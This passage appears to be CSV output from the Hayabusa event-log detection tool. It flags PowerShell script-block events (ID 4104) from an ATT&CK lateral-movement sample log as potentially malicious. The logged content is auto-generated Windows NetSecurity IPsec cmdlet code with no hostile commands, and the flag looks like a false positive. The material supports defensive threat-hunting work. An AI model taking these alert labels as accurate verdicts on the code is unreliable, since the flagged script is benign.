$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [Validate",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [Validate",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"NotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 